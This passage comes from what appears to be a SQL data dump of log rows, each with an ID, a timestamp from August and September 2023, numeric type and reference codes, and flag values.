(6478, '2023-08-26 04:13:47', 1, 2055, 0, 1, 1),
(6479, '2023-08-26 06:19:51', 1, 2063, 0, 1, 1),
(6480, '2023-08-26 06:51:56', 1, 2059, 0, 1, 1),
(6481, '2023-08-26 12:53:58', 1, 2055, 0, 1, 1),
(6482, '2023-08-26 15:01:56', 1, 2060, 0, 1, 1),
(6483, '2023-08-26 15:44:38', 1, 2054, 0, 1, 1),
(6484, '2023-08-26 16:42:27', 1, 2064, 0, 1, 1),
(6485, '2023-08-27 04:12:14', 1, 2055, 0, 1, 1),
(6486, '2023-08-27 14:01:35', 1, 2060, 0, 1, 1),
(6487, '2023-08-27 22:21:21', 1, 2058, 0, 1, 1),
(6488, '2023-08-28 04:08:39', 1, 2064, 0, 1, 1),
(6489, '2023-08-28 07:47:52', 1, 2060, 0, 1, 1),
(6490, '2023-08-28 07:58:06', 1, 2063, 0, 1, 1),
(6491, '2023-08-28 08:24:20', 1, 2058, 0, 1, 1),
(6492, '2023-08-28 08:40:09', 1, 2062, 0, 1, 1),
(6493, '2023-08-28 09:02:36', 1, 2062, 0, 1, 1),
(6494, '2023-08-28 09:15:25', 1, 2055, 0, 1, 1),
(6495, '2023-08-28 10:26:38', 1, 2060, 0, 1, 1),
(6496, '2023-08-28 10:37:02', 1, 2063, 0, 1, 1),
(6497, '2023-08-28 11:02:52', 1, 2058, 0, 1, 1),
(6498, '2023-08-28 11:53:08', 1, 2055, 0, 1, 1),
(6499, '2023-08-28 13:22:39', 1, 2061, 0, 1, 1),
(6500, '2023-08-28 14:01:30', 1, 2060, 0, 1, 1),
(6501, '2023-08-28 14:13:50', 1, 2063, 0, 1, 1),
(6502, '2023-08-28 14:44:22', 1, 2058, 0, 1, 1),
(6503, '2023-08-28 15:42:49', 1, 2055, 0, 1, 1),
(6504, '2023-08-28 16:12:09', 1, 2054, 0, 1, 1),
(6505, '2023-08-28 16:12:31', 1, 2055, 0, 1, 1),
(6506, '2023-08-28 16:14:00', 1, 2064, 0, 1, 1),
(6507, '2023-08-28 16:14:24', 1, 2063, 0, 1, 1),
(6508, '2023-08-28 16:14:45', 1, 2062, 0, 1, 1),
(6509, '2023-08-28 16:15:06', 1, 2060, 0, 1, 1),
(6510, '2023-08-28 16:15:26', 1, 2059, 0, 1, 1),
(6511, '2023-08-28 16:15:51', 1, 2061, 0, 1, 1),
(6512, '2023-08-28 16:16:11', 1, 2058, 0, 1, 1),
(6513, '2023-08-28 17:12:23', 1, 2061, 0, 1, 1),
(6514, '2023-08-28 17:59:20', 1, 2062, 0, 1, 1),
(6515, '2023-08-28 18:34:10', 1, 2060, 0, 1, 1),
(6516, '2023-08-28 18:44:28', 1, 2063, 0, 1, 1),
(6517, '2023-08-28 19:09:37', 1, 2058, 0, 1, 1),
(6518, '2023-08-28 20:00:04', 1, 2055, 0, 1, 1),
(6519, '2023-08-28 21:27:55', 1, 2061, 0, 1, 1),
(6520, '2023-08-28 22:13:24', 1, 2062, 0, 1, 1),
(6521, '2023-08-28 23:56:20', 1, 2054, 0, 1, 1),
(6522, '2023-08-29 00:22:49', 1, 2059, 0, 1, 1),
(6523, '2023-08-29 00:42:39', 1, 2064, 0, 1, 1),
(6524, '2023-08-29 03:56:10', 1, 2060, 0, 1, 1),
(6525, '2023-08-29 04:40:47', 1, 2064, 0, 1, 1),
(6526, '2023-08-29 07:15:26', 1, 2058, 0, 1, 1),
(6527, '2023-08-29 08:32:19', 1, 2053, 0, 1, 1),
(6528, '2023-08-29 10:22:51', 1, 2062, 0, 1, 1),
(6529, '2023-08-29 10:24:50', 1, 2060, 0, 1, 1),
(6530, '2023-08-29 10:26:51', 1, 2063, 0, 1, 1),
(6531, '2023-08-29 10:28:50', 1, 2055, 0, 1, 1),
(6532, '2023-08-29 10:30:50', 1, 2054, 0, 1, 1),
(6533, '2023-08-29 10:32:50', 1, 2060, 0, 1, 1),
(6534, '2023-08-29 10:34:51', 1, 2063, 0, 1, 1),
(6535, '2023-08-29 10:36:51', 1, 2058, 0, 1, 1),
(6536, '2023-08-29 14:10:56', 1, 2060, 0, 1, 1),
(6537, '2023-08-29 14:24:03', 1, 2063, 0, 1, 1),
(6538, '2023-08-29 14:56:28', 1, 2058, 0, 1, 1),
(6539, '2023-08-29 16:00:55', 1, 2055, 0, 1, 1),
(6540, '2023-08-29 16:03:34', 1, 2064, 0, 1, 1),
(6541, '2023-08-29 16:03:44', 1, 2061, 0, 1, 1),
(6542, '2023-08-29 16:03:51', 1, 2060, 0, 1, 1),
(6543, '2023-08-29 16:04:12', 1, 2063, 0, 1, 1),
(6544, '2023-08-29 16:04:38', 1, 2062, 0, 1, 1),
(6545, '2023-08-29 16:05:03', 1, 2058, 0, 1, 1),
(6546, '2023-08-29 16:05:21', 1, 2059, 0, 1, 1),
(6547, '2023-08-29 16:05:27', 1, 2054, 0, 1, 1),
(6548, '2023-08-29 16:05:34', 1, 2055, 0, 1, 1),
(6549, '2023-08-29 16:07:37', 1, 2053, 0, 1, 1),
(6550, '2023-08-29 16:32:40', 1, 2060, 0, 1, 1),
(6551, '2023-08-29 16:43:15', 1, 2063, 0, 1, 1),
(6552, '2023-08-29 17:09:17', 1, 2058, 0, 1, 1),
(6553, '2023-08-29 17:58:43', 1, 2055, 0, 1, 1),
(6554, '2023-08-29 19:28:30', 1, 2061, 0, 1, 1),
(6555, '2023-08-29 20:15:57', 1, 2062, 0, 1, 1),
(6556, '2023-08-29 20:36:45', 1, 2061, 0, 1, 1),
(6557, '2023-08-29 21:52:38', 1, 2054, 0, 1, 1),
(6558, '2023-08-29 22:14:39', 1, 2059, 0, 1, 1),
(6559, '2023-08-29 22:31:11', 1, 2064, 0, 1, 1),
(6560, '2023-08-29 23:46:44', 1, 2063, 0, 1, 1),
(6561, '2023-08-30 01:29:55', 1, 2060, 0, 1, 1),
(6562, '2023-08-30 01:44:09', 1, 2063, 0, 1, 1),
(6563, '2023-08-30 02:19:59', 1, 2058, 0, 1, 1),
(6564, '2023-08-30 02:21:36', 1, 2061, 0, 1, 1),
(6565, '2023-08-30 03:21:28', 1, 2055, 0, 1, 1),
(6566, '2023-08-30 03:36:51', 1, 2064, 0, 1, 1),
(6567, '2023-08-30 05:14:58', 1, 2061, 0, 1, 1),
(6568, '2023-08-30 06:10:12', 1, 2062, 0, 1, 1),
(6569, '2023-08-30 07:26:59', 1, 2055, 0, 1, 1),
(6570, '2023-08-30 07:27:02', 1, 2064, 0, 1, 1),
(6571, '2023-08-30 07:27:04', 1, 2061, 0, 1, 1),
(6572, '2023-08-30 07:27:07', 1, 2058, 0, 1, 1),
(6573, '2023-08-30 08:04:47', 1, 2054, 0, 1, 1),
(6574, '2023-08-30 08:27:18', 1, 2059, 0, 1, 1),
(6575, '2023-08-30 08:44:21', 1, 2064, 0, 1, 1),
(6576, '2023-08-30 10:32:01', 1, 2061, 0, 1, 1),
(6577, '2023-08-30 11:24:17', 1, 2061, 0, 1, 1),
(6578, '2023-08-30 20:10:29', 1, 2064, 0, 1, 1),
(6579, '2023-08-31 00:44:57', 1, 2061, 0, 1, 1),
(6580, '2023-08-31 01:34:59', 1, 2058, 0, 1, 1),
(6581, '2023-08-31 11:37:41', 1, 2054, 0, 1, 1),
(6582, '2023-08-31 11:41:43', 1, 2055, 0, 1, 1),
(6583, '2023-08-31 13:00:15', 1, 2062, 0, 1, 1),
(6584, '2023-08-31 17:09:02', 1, 2059, 0, 1, 1),
(6585, '2023-09-01 02:15:46', 1, 2060, 0, 1, 1),
(6586, '2023-09-01 03:42:59', 1, 2063, 0, 1, 1),
(6587, '2023-09-01 05:25:43', 1, 2054, 0, 1, 1),
(6588, '2023-09-01 15:48:17', 1, 2055, 0, 1, 1),
(6589, '2023-09-02 03:06:26', 1, 2064, 0, 1, 1),
(6590, '2023-09-02 04:54:38', 1, 2060, 0, 1, 1),
(6591, '2023-09-02 04:58:21', 1, 2062, 0, 1, 1),
(6592, '2023-09-02 11:29:57', 1, 2064, 0, 1, 1),
(6593, '2023-09-02 11:44:41', 1, 2059, 0, 1, 1),
(6594, '2023-09-02 12:37:54', 1, 2054, 0, 1, 1),
(6595, '2023-09-02 13:17:15', 1, 2060, 0, 1, 1),
(6596, '2023-09-02 13:59:11', 1, 2061, 0, 1, 1),
(6597, '2023-09-02 15:05:28', 1, 2059, 0, 1, 1),
(6598, '2023-09-02 15:51:28', 1, 2054, 0, 1, 1),
(6599, '2023-09-02 15:57:01', 1, 2064, 0, 1, 1),
(6600, '2023-09-02 17:11:19', 1, 2054, 0, 1, 1),
(6601, '2023-09-02 18:14:06', 1, 2060, 0, 1, 1),
(6602, '2023-09-02 19:20:08', 1, 2061, 0, 1, 1),
(6603, '2023-09-02 20:59:56', 1, 2059, 0, 1, 1),
(6604, '2023-09-02 22:16:23', 1, 2064, 0, 1, 1),
(6605, '2023-09-02 22:18:56', 1, 2055, 0, 1, 1),
(6606, '2023-09-02 23:20:51', 1, 2062, 0, 1, 1),
(6607, '2023-09-03 00:13:45', 1, 2054, 0, 1, 1),
(6608, '2023-09-03 00:32:01', 1, 2059, 0, 1, 1),
(6609, '2023-09-03 00:32:01', 1, 2059, 0, 1, 1),
(6610, '2023-09-03 00:32:02', 1, 2061, 0, 1, 1),
(6611, '2023-09-03 00:32:03', 1, 2061, 0, 1, 1),
(6612, '2023-09-03 00:32:03', 1, 2062, 0, 1, 1),
(6613, '2023-09-03 00:32:03', 1, 2063, 0, 1, 1),
(6614, '2023-09-03 00:32:04', 1, 2064, 0, 1, 1),
(6615, '2023-09-03 00:32:04', 1, 2055, 0, 1, 1),
(6616, '2023-09-03 00:32:05', 1, 2064, 0, 1, 1),
(6617, '2023-09-03 00:32:05', 1, 2063, 0, 1, 1),
(6618, '2023-09-03 00:32:07', 1, 2054, 0, 1, 1),
(6619, '2023-09-03 00:32:11', 1, 2058, 0, 1, 1),
(6620, '2023-09-03 00:32:12', 1, 2058, 0, 1, 1),
(6621, '2023-09-03 00:32:15', 1, 2062, 0, 1, 1),
(6622, '2023-09-03 00:32:16', 1, 2060, 0, 1, 1),
(6623, '2023-09-03 01:04:34', 1, 2063, 0, 1, 1),
(6624, '2023-09-03 01:12:10', 1, 2060, 0, 1, 1),
(6625, '2023-09-03 02:13:12', 1, 2061, 0, 1, 1),
(6626, '2023-09-03 03:14:19', 1, 2059, 0, 1, 1),
(6627, '2023-09-03 03:29:45', 1, 2059, 0, 1, 1),
(6628, '2023-09-03 03:45:45', 1, 2059, 0, 1, 1),
(6629, '2023-09-03 04:21:45', 4, 2061, 1110, 1, 1),
(6630, '2023-09-03 04:56:34', 1, 2064, 0, 1, 1),
(6631, '2023-09-03 05:56:36', 1, 2062, 0, 1, 1),
(6632, '2023-09-03 07:42:54', 1, 2055, 0, 1, 1),
(6633, '2023-09-03 09:15:41', 1, 2063, 0, 1, 1),
(6634, '2023-09-03 09:47:32', 1, 2058, 0, 1, 1),
(6635, '2023-09-03 12:40:46', 1, 2058, 0, 1, 1),
(6636, '2023-09-03 14:58:59', 4, 2061, 1111, 1, 1),
(6637, '2023-09-04 08:31:01', 1, 2061, 0, 1, 1),
(6638, '2023-09-04 11:08:13', 4, 2061, 1112, 1, 1),
(6639, '2023-09-05 00:19:51', 1, 2055, 0, 1, 1),
(6640, '2023-09-05 00:21:19', 1, 2059, 0, 1, 1),
(6641, '2023-09-05 00:23:15', 1, 2054, 0, 1, 1),
(6642, '2023-09-05 00:24:36', 1, 2064, 0, 1, 1),
(6643, '2023-09-05 00:26:38', 1, 2053, 0, 1, 1),
(6644, '2023-09-05 00:30:53', 1, 2060, 0, 1, 1),
(6645, '2023-09-05 00:36:42', 1, 2063, 0, 1, 1),
(6646, '2023-09-05 00:37:49', 1, 2054, 0, 1, 1),
(6647, '2023-09-05 00:41:10', 1, 2060, 0, 1, 1),
(6648, '2023-09-05 00:46:55', 1, 2062, 0, 1, 1),
(6649, '2023-09-05 00:53:04', 1, 2058, 0, 1, 1),
(6650, '2023-09-05 00:58:09', 1, 2063, 0, 1, 1),
(6651, '2023-09-05 06:16:31', 1, 2062, 0, 1, 1),
(6652, '2023-09-05 11:13:34', 1, 2054, 0, 1, 1),
(6653, '2023-09-05 11:21:30', 1, 2055, 0, 1, 1),
(6654, '2023-09-05 14:46:29', 1, 2059, 0, 1, 1),
(6655, '2023-09-05 15:53:59', 1, 2059, 0, 1, 1),
(6656, '2023-09-05 20:30:30', 1, 2064, 0, 1, 1),
(6657, '2023-09-05 23:02:40', 1, 2053, 0, 1, 1),
(6658, '2023-09-05 23:10:23', 1, 2055, 0, 1, 1),
(6659, '2023-09-05 23:11:35', 1, 2059, 0, 1, 1),
(6660, '2023-09-05 23:12:37', 1, 2054, 0, 1, 1),
(6661, '2023-09-05 23:13:44', 1, 2064, 0, 1, 1),
(6662, '2023-09-05 23:14:48', 1, 2053, 0, 1, 1),
(6663, '2023-09-05 23:15:53', 1, 2060, 0, 1, 1),
(6664, '2023-09-05 23:16:56', 1, 2060, 0, 1, 1),
(6665, '2023-09-05 23:17:34', 1, 2063, 0, 1, 1),
(6666, '2023-09-05 23:17:46', 1, 2062, 0, 1, 1),
(6667, '2023-09-05 23:18:34', 1, 2058, 0, 1, 1),
(6668, '2023-09-05 23:18:45', 1, 2063, 0, 1, 1),
(6669, '2023-09-06 01:48:02', 1, 2054, 0, 1, 1),
(6670, '2023-09-06 02:54:29', 1, 2063, 0, 1, 1),
(6671, '2023-09-06 10:44:07', 1, 2054, 0, 1, 1),
(6672, '2023-09-06 12:49:27', 1, 2054, 0, 1, 1),
(6673, '2023-09-06 14:58:30', 1, 2062, 0, 1, 1),
(6674, '2023-09-06 14:58:31', 1, 2060, 0, 1, 1),
(6675, '2023-09-06 15:06:46', 1, 2064, 0, 1, 1),
(6676, '2023-09-06 15:32:44', 1, 2061, 0, 1, 1),
(6677, '2023-09-06 18:52:28', 1, 2064, 0, 1, 1),
(6678, '2023-09-07 03:44:48', 1, 2053, 0, 1, 1),
(6679, '2023-09-07 07:49:52', 1, 2054, 0, 1, 1),
(6680, '2023-09-07 08:52:03', 1, 2063, 0, 1, 1),
(6681, '2023-09-07 14:31:48', 1, 2063, 0, 1, 1),
(6682, '2023-09-07 23:24:58', 1, 2059, 0, 1, 1),
(6683, '2023-09-08 07:51:58', 1, 2061, 0, 1, 1),
(6684, '2023-09-08 12:38:52', 1, 2058, 0, 1, 1),
(6685, '2023-09-08 12:38:55', 1, 2061, 0, 1, 1),
(6686, '2023-09-08 12:38:58', 1, 2059, 0, 1, 1),
(6687, '2023-09-08 12:39:01', 1, 2060, 0, 1, 1),
(6688, '2023-09-08 12:39:04', 1, 2062, 0, 1, 1),
(6689, '2023-09-08 12:39:08', 1, 2063, 0, 1, 1),
(6690, '2023-09-08 12:39:12', 1, 2064, 0, 1, 1),
(6691, '2023-09-08 12:40:15', 1, 2055, 0, 1, 1),
(6692, '2023-09-08 12:40:26', 1, 2054, 0, 1, 1),
(6693, '2023-09-08 12:40:36', 1, 2053, 0, 1, 1),
(6694, '2023-09-08 13:10:31', 1, 2058, 0, 1, 1),
(6695, '2023-09-08 13:10:49', 1, 2061, 0, 1, 1),
(6696, '2023-09-08 13:11:04', 1, 2059, 0, 1, 1),
(6697, '2023-09-08 13:11:26', 1, 2060, 0, 1, 1),
(6698, '2023-09-08 13:11:56', 1, 2062, 0, 1, 1),
(6699, '2023-09-08 13:12:20', 1, 2063, 0, 1, 1),
(6700, '2023-09-08 13:12:36', 1, 2064, 0, 1, 1),
(6701, '2023-09-08 13:14:00', 1, 2055, 0, 1, 1),
(6702, '2023-09-08 13:14:03', 1, 2054, 0, 1, 1),
(6703, '2023-09-08 13:14:07', 1, 2053, 0, 1, 1),
(6704, '2023-09-08 14:13:54', 1, 2061, 0, 1, 1),
(6705, '2023-09-08 20:53:36', 1, 2061, 0, 1, 1),
(6706, '2023-09-09 03:06:05', 1, 2062, 0, 1, 1),
(6707, '2023-09-09 05:34:59', 1, 2061, 0, 1, 1),
(6708, '2023-09-09 12:49:06', 1, 2064, 0, 1, 1),
(6709, '2023-09-09 18:31:09', 1, 2061, 0, 1, 1),
(6710, '2023-09-10 00:01:40', 1, 2059, 0, 1, 1),
(6711, '2023-09-10 00:38:27', 1, 2064, 0, 1, 1),
(6712, '2023-09-10 03:24:08', 1, 2059, 0, 1, 1),
(6713, '2023-09-10 06:40:05', 1, 2054, 0, 1, 1),
(6714, '2023-09-10 07:01:41', 1, 2058, 0, 1, 1),
(6715, '2023-09-10 09:14:23', 1, 2055, 0, 1, 1),
(6716, '2023-09-10 10:25:55', 1, 2063, 0, 1, 1),
(6717, '2023-09-10 17:15:43', 1, 2054, 0, 1, 1),
(6718, '2023-09-10 23:41:16', 1, 2061, 0, 1, 1),
(6719, '2023-09-11 03:06:15', 1, 2061, 0, 1, 1),
(6720, '2023-09-11 04:59:38', 1, 2064, 0, 1, 1),
(6721, '2023-09-11 09:08:10', 1, 2058, 0, 1, 1),
(6722, '2023-09-11 09:08:11', 1, 2058, 0, 1, 1),
(6723, '2023-09-11 09:08:11', 1, 2058, 0, 1, 1),
(6724, '2023-09-11 09:08:12', 1, 2058, 0, 1, 1),
(6725, '2023-09-11 09:08:13', 1, 2058, 0, 1, 1),
(6726, '2023-09-11 09:08:15', 1, 2058, 0, 1, 1),
(6727, '2023-09-11 09:08:18', 1, 2058, 0, 1, 1),
(6728, '2023-09-11 09:08:19', 1, 2058, 0, 1, 1),
(6729, '2023-09-11 09:08:21', 1, 2058, 0, 1, 1),
(6730, '2023-09-11 10:08:37', 1, 2058, 0, 1, 1),
(6731, '2023-09-11 10:08:45', 1, 2058, 0, 1, 1),
(6732, '2023-09-11 10:08:49', 1, 2058, 0, 1, 1),
(6733, '2023-09-11 10:09:00', 1, 2058, 0, 1, 1),
(6734, '2023-09-11 10:11:51', 1, 2058, 0, 1, 1),
(6735, '2023-09-11 10:18:59', 1, 2058, 0, 1, 1),
(6736, '2023-09-11 11:25:10', 1, 2058, 0, 1, 1),
(6737, '2023-09-11 11:25:10', 1, 2058, 0, 1, 1),
(6738, '2023-09-11 11:25:10', 1, 2058, 0, 1, 1),
(6739, '2023-09-11 11:25:14', 1, 2058, 0, 1, 1),
(6740, '2023-09-11 11:47:44', 1, 2058, 0, 1, 1),
(6741, '2023-09-11 14:09:54', 1, 2063, 0, 1, 1),
(6742, '2023-09-11 14:39:34', 1, 2058, 0, 1, 1),
(6743, '2023-09-11 17:59:30', 1, 2058, 0, 1, 1),
(6744, '2023-09-11 18:25:43', 1, 2062, 0, 1, 1),
(6745, '2023-09-12 00:55:20', 1, 2058, 0, 1, 1),
(6746, '2023-09-12 01:59:20', 1, 2064, 0, 1, 1),
(6747, '2023-09-12 02:38:09', 1, 2054, 0, 1, 1),
(6748, '2023-09-12 04:44:39', 1, 2062, 0, 1, 1),
(6749, '2023-09-12 05:29:56', 1, 2061, 0, 1, 1),
(6750, '2023-09-12 06:46:14', 1, 2058, 0, 1, 1),
(6751, '2023-09-12 07:07:00', 1, 2059, 0, 1, 1),
(6752, '2023-09-12 09:40:22', 1, 2064, 0, 1, 1),
(6753, '2023-09-12 13:38:52', 1, 2058, 0, 1, 1),
(6754, '2023-09-12 15:46:36', 1, 2058, 0, 1, 1),
(6755, '2023-09-12 15:47:16', 1, 2058, 0, 1, 1),
(6756, '2023-09-12 15:48:43', 1, 2058, 0, 1, 1),
(6757, '2023-09-12 16:07:42', 1, 2058, 0, 1, 1),
(6758, '2023-09-12 16:21:39', 1, 2058, 0, 1, 1),
(6759, '2023-09-12 16:28:14', 1, 2058, 0, 1, 1),
(6760, '2023-09-12 20:44:05', 1, 2060, 0, 1, 1),
(6761, '2023-09-13 02:35:38', 1, 2058, 0, 1, 1),
(6762, '2023-09-13 03:01:22', 1, 2061, 0, 1, 1),
(6763, '2023-09-13 03:01:27', 4, 2061, 1137, 1, 1),
(6764, '2023-09-13 04:26:30', 1, 2055, 0, 1, 1),
(6765, '2023-09-13 12:13:38', 1, 2054, 0, 1, 1),
(6766, '2023-09-13 20:52:16', 1, 2062, 0, 1, 1),
(6767, '2023-09-13 20:52:16', 1, 2061, 0, 1, 1),
(6768, '2023-09-13 20:52:16', 1, 2063, 0, 1, 1),
(6769, '2023-09-13 20:52:16', 1, 2060, 0, 1, 1),
(6770, '2023-09-13 20:52:16', 1, 2064, 0, 1, 1),
(6771, '2023-09-13 20:52:16', 1, 2059, 0, 1, 1),
(6772, '2023-09-13 20:52:18', 1, 2058, 0, 1, 1),
(6773, '2023-09-13 20:52:18', 1, 2055, 0, 1, 1),
(6774, '2023-09-13 20:52:18', 1, 2054, 0, 1, 1),
(6775, '2023-09-13 22:59:43', 1, 2053, 0, 1, 1),
(6776, '2023-09-13 23:47:39', 1, 2064, 0, 1, 1),
(6777, '2023-09-14 02:52:35', 1, 2061, 0, 1, 1),
(6778, '2023-09-14 05:44:57', 1, 2060, 0, 1, 1),
(6779, '2023-09-14 08:31:09', 1, 2055, 0, 1, 1),
(6780, '2023-09-14 09:17:22', 1, 2059, 0, 1, 1),
(6781, '2023-09-14 12:03:22', 1, 2054, 0, 1, 1),
(6782, '2023-09-14 12:03:23', 1, 2059, 0, 1, 1),
(6783, '2023-09-14 12:03:24', 1, 2055, 0, 1, 1),
(6784, '2023-09-14 12:03:25', 1, 2062, 0, 1, 1),
(6785, '2023-09-14 12:03:26', 1, 2061, 0, 1, 1),
(6786, '2023-09-14 12:03:27', 1, 2060, 0, 1, 1),
(6787, '2023-09-14 12:03:27', 1, 2058, 0, 1, 1),
(6788, '2023-09-14 12:03:29', 1, 2064, 0, 1, 1),
(6789, '2023-09-14 12:03:31', 1, 2063, 0, 1, 1),
(6790, '2023-09-14 12:03:37', 1, 2053, 0, 1, 1),
(6791, '2023-09-14 12:31:55', 1, 2061, 0, 1, 1),
(6792, '2023-09-14 12:55:16', 1, 2054, 0, 1, 1),
(6793, '2023-09-14 13:27:09', 1, 2064, 0, 1, 1),
(6794, '2023-09-14 15:42:12', 1, 2060, 0, 1, 1),
(6795, '2023-09-14 20:42:39', 1, 2063, 0, 1, 1),
(6796, '2023-09-15 00:23:38', 1, 2058, 0, 1, 1),
(6797, '2023-09-15 07:59:29', 1, 2062, 0, 1, 1),
(6798, '2023-09-15 10:30:39', 1, 2061, 0, 1, 1),
(6799, '2023-09-15 14:00:43', 1, 2063, 0, 1, 1),
(6800, '2023-09-15 14:26:50', 1, 2059, 0, 1, 1),
(6801, '2023-09-15 14:50:59', 1, 2054, 0, 1, 1),
(6802, '2023-09-15 14:51:56', 1, 2055, 0, 1, 1),
(6803, '2023-09-15 14:54:18', 1, 2064, 0, 1, 1),
(6804, '2023-09-15 14:55:44', 1, 2063, 0, 1, 1),
(6805, '2023-09-15 14:56:40', 1, 2062, 0, 1, 1),
(6806, '2023-09-15 14:57:36', 1, 2060, 0, 1, 1),
(6807, '2023-09-15 14:58:32', 1, 2059, 0, 1, 1),
(6808, '2023-09-15 14:59:28', 1, 2061, 0, 1, 1),
(6809, '2023-09-15 15:00:24', 1, 2058, 0, 1, 1),
(6810, '2023-09-15 18:23:35', 1, 2058, 0, 1, 1),
(6811, '2023-09-15 22:45:22', 1, 2059, 0, 1, 1),
(6812, '2023-09-16 02:27:40', 1, 2060, 0, 1, 1),
(6813, '2023-09-16 04:53:08', 1, 2064, 0, 1, 1),
(6814, '2023-09-16 07:51:47', 1, 2059, 0, 1, 1),
(6815, '2023-09-16 08:17:03', 1, 2064, 0, 1, 1),
(6816, '2023-09-16 11:52:36', 1, 2061, 0, 1, 1),
(6817, '2023-09-16 13:47:53', 1, 2062, 0, 1, 1),
(6818, '2023-09-16 14:25:22', 1, 2060, 0, 1, 1),
(6819, '2023-09-16 20:00:17', 1, 2059, 0, 1, 1),
(6820, '2023-09-17 04:04:42', 1, 2058, 0, 1, 1),
(6821, '2023-09-17 07:51:52', 1, 2055, 0, 1, 1),
(6822, '2023-09-17 07:53:44', 1, 2061, 0, 1, 1),
(6823, '2023-09-17 08:38:19', 1, 2064, 0, 1, 1),
(6824, '2023-09-17 09:19:35', 1, 2061, 0, 1, 1),
(6825, '2023-09-17 14:35:45', 1, 2059, 0, 1, 1),
(6826, '2023-09-17 17:44:41', 1, 2061, 0, 1, 1),
(6827, '2023-09-17 21:07:45', 1, 2058, 0, 1, 1),
(6828, '2023-09-18 03:11:47', 1, 2055, 0, 1, 1),
(6829, '2023-09-18 04:18:31', 1, 2054, 0, 1, 1),
(6830, '2023-09-18 05:01:11', 1, 2058, 0, 1, 1),
(6831, '2023-09-18 10:57:16', 1, 2063, 0, 1, 1),
(6832, '2023-09-18 10:57:17', 1, 2059, 0, 1, 1),
(6833, '2023-09-18 10:57:18', 1, 2054, 0, 1, 1),
(6834, '2023-09-18 10:57:21', 1, 2064, 0, 1, 1),
(6835, '2023-09-18 10:57:22', 1, 2061, 0, 1, 1),
(6836, '2023-09-18 10:57:24', 1, 2062, 0, 1, 1),
(6837, '2023-09-18 10:57:26', 1, 2058, 0, 1, 1),
(6838, '2023-09-18 10:57:28', 1, 2055, 0, 1, 1),
(6839, '2023-09-18 10:57:40', 1, 2060, 0, 1, 1),
(6840, '2023-09-18 14:42:59', 1, 2061, 0, 1, 1),
(6841, '2023-09-18 14:43:03', 4, 2061, 1151, 1, 1),
(6842, '2023-09-18 22:27:39', 1, 2058, 0, 1, 1),
(6843, '2023-09-19 01:13:11', 1, 2058, 0, 1, 1),
(6844, '2023-09-19 01:37:53', 1, 2058, 0, 1, 1),
(6845, '2023-09-19 07:12:42', 1, 2059, 0, 1, 1),
(6846, '2023-09-19 13:33:45', 1, 2059, 0, 1, 1),
(6847, '2023-09-19 14:48:45', 1, 2059, 0, 1, 1),
(6848, '2023-09-19 17:06:40', 1, 2063, 0, 1, 1),
(6849, '2023-09-19 19:20:51', 1, 2060, 0, 1, 1),
(6850, '2023-09-19 20:00:48', 1, 2063, 0, 1, 1),
(6851, '2023-09-19 22:45:36', 1, 2059, 0, 1, 1),
(6852, '2023-09-20 01:26:12', 1, 2055, 0, 1, 1),
(6853, '2023-09-20 01:31:26', 1, 2053, 0, 1, 1),
(6854, '2023-09-20 01:32:28', 1, 2054, 0, 1, 1),
(6855, '2023-09-20 01:33:32', 1, 2060, 0, 1, 1),
(6856, '2023-09-20 01:34:34', 1, 2060, 0, 1, 1),
(6857, '2023-09-20 01:35:45', 1, 2058, 0, 1, 1),
(6858, '2023-09-20 01:36:42', 1, 2063, 0, 1, 1),
(6859, '2023-09-20 01:37:05', 1, 2062, 0, 1, 1),
(6860, '2023-09-20 17:30:25', 1, 2058, 0, 1, 1),
(6861, '2023-09-20 21:07:51', 1, 2064, 0, 1, 1),
(6862, '2023-09-20 23:55:35', 1, 2059, 0, 1, 1),
(6863, '2023-09-21 03:57:41', 1, 2064, 0, 1, 1),
(6864, '2023-09-21 05:10:15', 1, 2054, 0, 1, 1),
(6865, '2023-09-21 05:24:05', 1, 2064, 0, 1, 1),
(6866, '2023-09-21 06:06:38', 1, 2064, 0, 1, 1),
(6867, '2023-09-21 06:43:45', 1, 2064, 0, 1, 1),
(6868, '2023-09-21 07:11:24', 1, 2061, 0, 1, 1),
(6869, '2023-09-21 07:15:51', 1, 2062, 0, 1, 1),
(6870, '2023-09-21 07:31:50', 1, 2061, 0, 1, 1),
(6871, '2023-09-21 09:49:15', 1, 2061, 0, 1, 1),
(6872, '2023-09-21 13:01:40', 1, 2061, 0, 1, 1),
(6873, '2023-09-21 14:42:45', 1, 2054, 0, 1, 1),
(6874, '2023-09-21 21:32:02', 1, 2059, 0, 1, 1),
(6875, '2023-09-21 23:18:14', 1, 2059, 0, 1, 1),
(6876, '2023-09-22 02:57:18', 1, 2055, 0, 1, 1),
(6877, '2023-09-22 02:58:25', 1, 2053, 0, 1, 1),
(6878, '2023-09-22 02:59:25', 1, 2054, 0, 1, 1),
(6879, '2023-09-22 03:00:23', 1, 2060, 0, 1, 1),
(6880, '2023-09-22 03:01:22', 1, 2060, 0, 1, 1),
(6881, '2023-09-22 03:02:13', 1, 2058, 0, 1, 1),
(6882, '2023-09-22 03:03:13', 1, 2063, 0, 1, 1),
(6883, '2023-09-22 03:03:23', 1, 2062, 0, 1, 1),
(6884, '2023-09-22 04:38:48', 1, 2059, 0, 1, 1),
(6885, '2023-09-22 07:04:50', 1, 2054, 0, 1, 1),
(6886, '2023-09-22 07:40:42', 1, 2060, 0, 1, 1),
(6887, '2023-09-22 08:19:32', 1, 2061, 0, 1, 1),
(6888, '2023-09-22 09:18:13', 1, 2059, 0, 1, 1),
(6889, '2023-09-22 09:27:10', 1, 2059, 0, 1, 1),
(6890, '2023-09-22 10:02:47', 1, 2064, 0, 1, 1),
(6891, '2023-09-22 10:40:42', 1, 2062, 0, 1, 1),
(6892, '2023-09-22 11:42:26', 1, 2055, 0, 1, 1),
(6893, '2023-09-22 12:38:39', 1, 2063, 0, 1, 1),
(6894, '2023-09-22 12:49:14', 1, 2061, 0, 1, 1),
(6895, '2023-09-22 12:56:55', 1, 2058, 0, 1, 1),
(6896, '2023-09-22 14:12:50', 1, 2055, 0, 1, 1),
(6897, '2023-09-22 15:46:15', 1, 2059, 0, 1, 1),
(6898, '2023-09-22 19:56:05', 1, 2063, 0, 1, 1),
(6899, '2023-09-23 00:38:57', 1, 2054, 0, 1, 1),
(6900, '2023-09-23 01:13:41', 1, 2060, 0, 1, 1),
(6901, '2023-09-23 01:50:20', 1, 2061, 0, 1, 1),
(6902, '2023-09-23 01:55:03', 1, 2059, 0, 1, 1),
(6903, '2023-09-23 02:46:56', 1, 2059, 0, 1, 1),
(6904, '2023-09-23 03:29:22', 1, 2064, 0, 1, 1),
(6905, '2023-09-23 04:05:50', 1, 2062, 0, 1, 1),
